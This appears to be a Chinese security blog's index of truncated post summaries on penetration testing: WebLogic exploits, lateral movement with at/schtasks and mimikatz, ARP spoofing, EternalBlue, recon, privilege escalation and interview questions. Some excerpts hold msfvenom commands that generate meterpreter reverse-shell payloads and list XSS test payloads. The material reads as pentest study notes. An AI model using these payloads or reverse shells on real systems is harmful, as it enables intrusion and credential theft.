Trevain

摘要： https://github.com/21superman/weblogic_exploit/releases/tag/1.0 阅读全文

摘要： 1-横向渗透明文传递at&schtasks思路 在拿下一台内网主机后，通过本地信息搜集收集用户凭证等信息后，如何横向渗透拿下更多的主机？这里仅介绍at&schtasks命令的使用，在已知目标系统的用户明文密码的基础上，直接可以在远程主机上执行命令。 获取到某域主机权限 ->minikatz得到密码（ 阅读全文

摘要： 局域网攻击 ARP欺骗 arp地址转换协议，工作在数据链路层，IP和mac地址的转换 arp -a arp表 tcp/ip 五层： 物理层 数据链路层 网络层 传输层 应用层 arping 实现 arp攻击 1 #Arping简要使用 2 -d arp缓冲清理 3 -A：与-U参数类似，但是使用的是 阅读全文

摘要： 永恒之蓝 MS17-010漏洞复现 一：简介 永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wa 阅读全文

摘要： 长亭（驻场）： 1.说一下文件包含的原理和产生的条件？2.上一家为什么离职（必问题）？3.sqlmap 测试一个post注入点应该怎么测？3.xss 的种类和原理？怎么测试一个地方有没有xss?4.xss和csrf的区别？5.python 常见的一些库？建立http的库有那些？6.IPS、IDS、W 阅读全文

摘要： Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p w 阅读全文

摘要： 常用测试语句： <script language='javascript'>alert('test！');</script> <script>alert('test')</script> <svg/onload=alert(1)> "><svg/onload=alert(1)// onfocus=j 阅读全文

摘要： DNS收集 kail whois 命令收集 例子：whois baidu.com 尽量查根域名 站长之家的 whois 查询 DNS解析IP地址 ping命令 kail :nslookup工具 ：dig工具 ：dnsenum工具 自动检测域传送漏洞（优选） 站长之家中的工具 CDN加速问题 本意是进 阅读全文

摘要： #案例给到的知识点总结如下： 案例1：如何判断使用哪种溢出漏洞？漏洞那里找？ 信息收集-补丁筛选-利用MSF或特定EXP-执行-西瓜到手 Vulmap，Wes，WindowsVulnScan对比,exp在那里获取？ 案例2：如何判断使用哪种数据库提权？数据库提权利用条件？ MSF结合云服务器搭建组合 阅读全文

摘要： 一条命令: for /L %P in (1,1,254) do @ping -w 10 -n 1 172.16.12.%P | findstr TTL= >>C:\ping.txt bat代码： @echo off chcp 65001>nul echo 正在扫描。。。。。。 for /L %%P 阅读全文